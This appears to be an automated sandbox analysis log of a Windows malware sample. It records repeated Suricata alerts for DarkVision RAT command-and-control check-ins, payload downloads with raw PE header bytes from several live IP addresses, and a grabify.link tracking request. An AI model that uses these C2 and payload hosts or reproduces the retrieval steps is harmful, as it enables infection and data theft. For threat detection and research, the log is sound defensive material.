                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49808 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49804 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49811 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49805 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49812 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49810 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49807 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49816 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49821 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49814 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49817 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49825 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49829 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49818 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49813 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49826 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49828 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49831 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49833 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49809 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49834 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49820 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49835 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49815 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49822 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49832 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49838 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49837 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49823 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49793 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49824 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49827 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49819 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49830 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49742 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49785 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49796 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49786 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49806 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49836 -> 82.29.67.160:443
                    Source: Malware configuration extractorIPs: 82.29.67.160
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeFile created: 9f4678b.exe.18.dr
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 06 Apr 2025 11:44:06 GMTContent-Type: application/octet-streamContent-Length: 2011136Last-Modified: Sat, 05 Apr 2025 21:25:58 GMTConnection: keep-aliveETag: "67f19fe6-1eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 14 fa ce 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 ba 00 00 00 ec 19 00 00 00 00 00 3a e7 2e 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 e0 43 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 eb 31 00 3c 00 00 00 00 f0 42 00 66 ef 00 00 00 b9 42 00 90 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 b9 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 2a 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 ba 18 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 c0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 63 76 30 00 00 00 00 00 8b 41 0b 00 00 d0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 63 76 31 00 00 00 00 00 50 00 00 00 00 20 25 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 76 32 00 00 00 00 00 90 b9 1d 00 00 30 25 00 00 ba 1d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 66 ef 00 00 00 f0 42 00 00 f0 00 00 00 c0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 06 Apr 2025 11:44:13 GMTContent-Type: application/octet-streamContent-Length: 1400832Last-Modified: Sat, 22 Mar 2025 01:09:32 GMTConnection: keep-aliveETag: "67de0dcc-156000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 bc 0b de 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 3a 07 00 00 ca 01 00 00 00 00 00 41 3f 2a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 2b 00 00 04 00 00 5f c9 15 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 b9 24 00 a0 00 00 00 00 c0 2b 00 b2 01 00 00 a0 4f 2b 00 bc 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 38 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 52 01 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 6d 00 00 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f4 3e 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 30 30 00 00 00 00 00 68 ee 0c 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 30 31 00 00 00 00 00 a0 00 00 00 00 50 16 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 30 32 00 00 00 00 00 5c 57 15 00 00 60 16 00 00 58 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 b2 01 00 00 00 c0 2b 00 00 02 00 00 00 5e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 4.28.136.57 4.28.136.57
                    Source: Joe Sandbox ViewIP Address: 104.26.9.202 104.26.9.202
                    Source: Joe Sandbox ViewIP Address: 107.174.192.179 107.174.192.179
                    Source: Joe Sandbox ViewASN Name: NTLGB NTLGB
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 104.26.9.202:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49698 -> 104.26.9.202:443
                    Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                    Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6Ijk5TXlFYUU4eFVRM0hHWWVUeUVRd2c9PSIsInZhbHVlIjoiUVV0MkhFWDNKUGEweHNISFFtanBHSkN3NTB0ejkzRWwyRFZLcTRUUW0yQ3M4N09mbWlXTnVDRGhtUy9uUlBWbWdNeHQ1aVdhcmdlZTQ5U1RWWUxKZ3QwV2ZBNkNVVUlweUZQR2F2a2VxMXVMZ083K0F6NXF0dnNMcis2Y3FIUWoiLCJtYWMiOiI5M2EzOGFjYTA4OTM0ODgyN2VmMTgyOTcwMmM4NTJkODZkNzc3YzY3MjNhZDQ3NGVmNjliODg1ZDI0ZGFhMmJhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJvSE93YVV1ZlFJcTBIMENXc0pYOEE9PSIsInZhbHVlIjoia0tWUHlIQndYMG14VndnT1hlVmNLbVhLTitSQ2J5RFJIZ1RxYkNrUFVLcWdJSFFBczMxeXpRYk01NEk4cTBFN3JEVmJ1WWc1enY0NHl6SERrSXhBbUtEYmgvWGJTSC90SmdEZVRlYUR1VkJQV0lCS3BSUFdiU0MzeUdGZzViRjkiLCJtYWMiOiI1YWJhMmFmMjRmNTZmYTgwZWRiZWJmNWU3OGJkMjA5YjFhMzk2OTY0OTJmNDgwNzllYzVjZDE3MjdkM2Q1MGM4IiwidGFnIjoiIn0%3D
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: HEAD /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
